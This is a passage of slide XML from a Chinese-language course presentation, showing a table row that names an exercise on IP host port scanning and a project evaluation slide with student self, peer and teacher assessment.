                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>10.IP协议的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4102735" y="5148580"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
